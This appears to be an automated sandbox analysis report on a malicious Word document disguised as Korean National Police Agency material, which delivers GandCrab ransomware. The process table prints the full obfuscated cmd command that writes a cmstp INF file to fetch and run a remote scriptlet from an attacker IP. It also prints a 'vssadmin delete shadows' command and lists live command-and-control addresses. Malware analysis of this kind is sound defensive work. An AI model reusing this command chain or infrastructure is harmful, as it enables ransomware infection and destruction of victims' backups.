File name: | Korean National Police Agency.doc |
Full analysis: | https://app.any.run/tasks/2c2de957-8ffe-4188-8295-41fb043e46cb |
Verdict: | Malicious activity |
Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
Analysis date: | March 22, 2019, 10:25:19 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Admin, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Jan 31 14:52:00 2019, Last Saved Time/Date: Thu Mar 21 19:19:00 2019, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0 |
MD5: | 6D70903794AB3CA05DD1B1B4F917204F |
SHA1: | DBE96D823FB6C1B855020EA6676F27E9C13A0148 |
SHA256: | D383CEE6586F23BC1DCDD4D1E8638D58E795C0833111BCBD94AE1FB883AAE988 |
SSDEEP: | 3072:B6pgFP6P77AjBNJx4WDgDBiTBEIGMqFWrdn2TXz+rOieOnewQKJk2iwHagf:B6pO+AnJ2Wsi9EI4EdGKOseZ6z |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 26 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 23 |
Words: | 4 |
Pages: | 1 |
ModifyDate: | 2019:03:21 19:19:00 |
CreateDate: | 2019:02:28 14:52:00 |
TotalEditTime: | 2.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 3 |
LastModifiedBy: | Admin |
Template: | Normal |
Comments: | - |
Keywords: | - |
Author: | Admin |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2364 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Korean National Police Agency.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.5123.5000 | ||||
2520 | cmd /V /C set "u05=s" && !u05!et "u39=\" && !u05!et "u42=e" && !u05!et "u43=i" && !u05!et "u49=A" && !u05!et "u1=N" && !u05!et "u5=d" && c!u49!ll !u05!et "u6=%!u49!PP!u5!!u49!T!u49!%" && c!u49!ll !u05!et "u63=%R!u49!!u1!!u5!OM%" && !u05!et "u62=!u6!!u39!M!u43!cro!u05!oft!u39!T!u42!mplat!u42!s!u39!!u63!.txt" && !u05!et "u8="^" && (For %i in ("[v!u42!r!u05!ion]" "!u05!ignatur!u42!=$Wi!u1!dow!u05! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[D!u42!faultIn!u05!tall_Singl!u42!U!u05!er]" "UnR!u42!gi!u05!t!u42!rOCXs=u66" "[u66]" "%11%\%u0_1%%u0_2%%u0_3%,NI,%u_1%%u_2%%u_3%%u_4%%u_5%%u_6%%u_7%%u_8%%u_9%%u_10%%u_11%%u_12%%u_13%%u_14%" "[!u05!tring!u05!]" "u_1=ht" "u_2=tp" "u_3=:/" "u_4=/1" "u_5=34" "u_6=.2" "u_7=09" "u_8=.8" "u_9=8." "u_10=23" "u_11=/s" "u_12=ub" "u_13=.t" "u_14=xt" "u0_2=rO" "u0_1=sC" "u0_3=bJ" ) do @echo %~i)>"!u62!" && echo !u05!erv!u43!ceNam!u42!=!u8! !u8!>>!u62! && echo !u05!hortSvcN!u49!me=!u8! !u8!>>!u62! && c!u49!ll !u05!et "u25=%WI!u1!!u5!IR%" && !u05!t!u49!rt "" !u25!!u39!Sy!u05!t!u42!m32!u39!cm!u05!tp.!u42!x!u42! /s /ns "!u62!" | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2068 | C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\Templates\5158.txt" | C:\Windows\System32\cmstp.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile Installer Exit code: 0 Version: 7.02.7600.16385 (win7_rtm.090713-1255) | ||||
2916 | "C:\Users\admin\AppData\Roaming\Microsoft\22234.exe" | C:\Users\admin\AppData\Roaming\Microsoft\22234.exe | cmstp.exe | |
User: admin Integrity Level: MEDIUM | ||||
1464 | "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet | C:\Windows\SysWOW64\cmd.exe | — | 22234.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2600 | vssadmin delete shadows /all /quiet | C:\Windows\SysWOW64\vssadmin.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Command Line Interface for Microsoft® Volume Shadow Copy Service Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2072 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\LDNHNBPJ-MANUAL.txt | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR38B0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFF8E91B4464A26DCE.TMP | — | |
MD5:— | SHA256:— | |||
2916 | 22234.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | — | |
MD5:— | SHA256:— | |||
2068 | cmstp.exe | C:\Users\admin\AppData\Roaming\Microsoft\22234.exe | executable | |
MD5:28F9A6802A8A1712F9FD0ACCE6697F4E | SHA256:711048D0C36EC880E9758F27859D4415F7A8883A7F8E8B9777C6EF28C18087D2 | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{69CE160E-14E2-42E0-BBF3-59DFF0374C11}.tmp | binary | |
MD5:0197220D9831F0BF6EB8D9A3189EE463 | SHA256:E1B65DE35723C2D432D19652A4ACE6B52A1F6DD08CCACC80D72ED3A141E3779B | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:074930088FFE83A3DB169A2F1C50A6C8 | SHA256:07200C4DC1CE11EF5FD29F52012693B246E3A62DA41F1E5ABFF6D6EDFCAE507A | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2EF1A6B.wmf | wmf | |
MD5:9B958D431B80584579043950B6329CC2 | SHA256:0C014D127F39FDEEDFA2229D89442011E65B0B09A38F748231D64FCE5E29224E | |||
2520 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\Templates\5158.txt | ini | |
MD5:8D31B290C617BC92B96D345855D4AF60 | SHA256:4B486FDC8C0CC7716E85C448F4795735FC3091331F1FB337E660BDFCA20453F4 | |||
2916 | 22234.exe | C:\$Recycle.Bin\S-1-5-21-3896776584-4254864009-862391680-1000\LDNHNBPJ-MANUAL.txt | text | |
MD5:1FCE3D59A2EE54D6F434FA5A3833B2F4 | SHA256:3D9ED1473B6E66C3D93EA6146FAA5DC239B3FA62D30345670F12299BB826DEA7 | |||
2068 | cmstp.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\sub[1].txt | xml | |
MD5:35E0074B26434734B8C87DE20DAE3AD6 | SHA256:640EE8EC46C660C9D1784AAC3EB73FEA64586416B6935251638E319CC5E72D87 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2916 | 22234.exe | POST | 404 | 107.173.49.208:443 | https://www.kakaocorp.link/static/pictures/kaeszu.jpg | US | html | 603 b | malicious |
2068 | cmstp.exe | GET | 200 | 134.209.88.23:80 | http://134.209.88.23/sub.txt | US | xml | 259 Kb | malicious |
2916 | 22234.exe | GET | 301 | 107.173.49.208:80 | http://www.kakaocorp.link/ | US | html | 162 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2916 | 22234.exe | 107.173.49.208:443 | www.kakaocorp.link | ColoCrossing | US | malicious |
2916 | 22234.exe | 107.173.49.208:80 | www.kakaocorp.link | ColoCrossing | US | malicious |
2068 | cmstp.exe | 134.209.88.23:80 | — | — | US | malicious |
Domain | IP | Reputation |
---|---|---|
www.kakaocorp.link |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2068 | cmstp.exe | A Network Trojan was detected | MALWARE [PTsecurity] Squiblydoo Scriptlet |
2068 | cmstp.exe | Generic Protocol Command Decode | SURICATA STREAM excessive retransmissions |